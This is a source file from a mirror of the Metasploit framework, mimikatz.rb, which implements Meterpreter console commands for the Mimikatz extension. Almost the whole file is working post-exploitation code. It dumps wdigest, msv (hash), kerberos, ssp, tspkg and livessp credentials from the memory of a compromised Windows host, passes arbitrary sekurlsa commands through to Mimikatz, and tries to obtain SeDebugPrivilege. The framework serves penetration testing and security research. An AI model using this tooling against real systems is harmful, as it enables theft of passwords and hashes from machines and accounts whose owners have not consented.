Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

mimikatz.rb 4.0KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182
  1. # -*- coding: binary -*-
  2. require 'rex/post/meterpreter'
  3. module Rex
  4. module Post
  5. module Meterpreter
  6. module Ui
  7. ###
  8. #
  9. # Mimikatz extension - grabs credentials from windows memory.
  10. #
  11. # Benjamin DELPY `gentilkiwi`
  12. # http://blog.gentilkiwi.com/mimikatz
  13. #
  14. # extension converted by Ben Campbell (Meatballs)
  15. ###
  16. class Console::CommandDispatcher::Mimikatz
  17. Klass = Console::CommandDispatcher::Mimikatz
  18. include Console::CommandDispatcher
  19. #
  20. # Initializes an instance of the priv command interaction.
  21. #
  22. def initialize(shell)
  23. super
  24. if (client.platform =~ /x86/) and (client.sys.config.sysinfo['Architecture'] =~ /x64/)
  25. print_line
  26. print_warning "Loaded x86 Mimikatz on an x64 architecture."
  27. end
  28. end
  29. #
  30. # List of supported commands.
  31. #
  32. def commands
  33. {
  34. "mimikatz_command" => "Run a custom command",
  35. "wdigest" => "Attempt to retrieve wdigest creds",
  36. "msv" => "Attempt to retrieve msv creds (hashes)",
  37. "livessp" => "Attempt to retrieve livessp creds",
  38. "ssp" => "Attempt to retrieve ssp creds",
  39. "tspkg" => "Attempt to retrieve tspkg creds",
  40. "kerberos" => "Attempt to retrieve kerberos creds"
  41. }
  42. end
  43. @@command_opts = Rex::Parser::Arguments.new(
  44. "-f" => [true, "The function to pass to the command."],
  45. "-a" => [true, "The arguments to pass to the command."],
  46. "-h" => [false, "Help menu."]
  47. )
  48. def cmd_mimikatz_command(*args)
  49. if (args.length == 0)
  50. args.unshift("-h")
  51. end
  52. cmd_args = nil
  53. cmd_func = nil
  54. arguments = []
  55. @@command_opts.parse(args) { |opt, idx, val|
  56. case opt
  57. when "-a"
  58. cmd_args = val
  59. when "-f"
  60. cmd_func = val
  61. when "-h"
  62. print(
  63. "Usage: mimikatz_command -f func -a args\n\n" +
  64. "Executes a mimikatz command on the remote machine.\n" +
  65. "e.g. mimikatz_command -f sekurlsa::wdigest -a \"full\"\n" +
  66. @@command_opts.usage)
  67. return true
  68. end
  69. }
  70. unless cmd_func
  71. print_error("You must specify a function with -f")
  72. return true
  73. end
  74. if cmd_args
  75. arguments = cmd_args.split(" ")
  76. end
  77. print_line client.mimikatz.send_custom_command(cmd_func, arguments)
  78. end
  79. def mimikatz_request(provider, method)
  80. get_privs
  81. print_status("Retrieving #{provider} credentials")
  82. accounts = method.call
  83. table = Rex::Text::Table.new(
  84. 'Header' => "#{provider} credentials",
  85. 'Indent' => 0,
  86. 'SortIndex' => 4,
  87. 'Columns' =>
  88. [
  89. 'AuthID', 'Package', 'Domain', 'User', 'Password'
  90. ]
  91. )
  92. accounts.each do |acc|
  93. table << [acc[:authid], acc[:package], acc[:domain], acc[:user], (acc[:password] || "").gsub("\n","")]
  94. end
  95. print_line table.to_s
  96. return true
  97. end
  98. def cmd_wdigest(*args)
  99. method = Proc.new { client.mimikatz.wdigest }
  100. mimikatz_request("wdigest", method)
  101. end
  102. def cmd_msv(*args)
  103. method = Proc.new { client.mimikatz.msv }
  104. mimikatz_request("msv", method)
  105. end
  106. def cmd_livessp(*args)
  107. method = Proc.new { client.mimikatz.livessp }
  108. mimikatz_request("livessp", method)
  109. end
  110. def cmd_ssp(*args)
  111. method = Proc.new { client.mimikatz.ssp }
  112. mimikatz_request("ssp", method)
  113. end
  114. def cmd_tspkg(*args)
  115. method = Proc.new { client.mimikatz.tspkg }
  116. mimikatz_request("tspkg", method)
  117. end
  118. def cmd_kerberos(*args)
  119. method = Proc.new { client.mimikatz.kerberos }
  120. mimikatz_request("kerberos", method)
  121. end
  122. def get_privs
  123. unless system_check
  124. print_status("Attempting to getprivs")
  125. privs = client.sys.config.getprivs
  126. unless privs.include? "SeDebugPrivilege"
  127. print_warning("Did not get SeDebugPrivilege")
  128. else
  129. print_good("Got SeDebugPrivilege")
  130. end
  131. else
  132. print_good("Running as SYSTEM")
  133. end
  134. end
  135. def system_check
  136. unless (client.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
  137. print_warning("Not currently running as SYSTEM")
  138. return false
  139. end
  140. return true
  141. end
  142. #
  143. # Name for this dispatcher
  144. #
  145. def name
  146. "Mimikatz"
  147. end
  148. end
  149. end
  150. end
  151. end
  152. end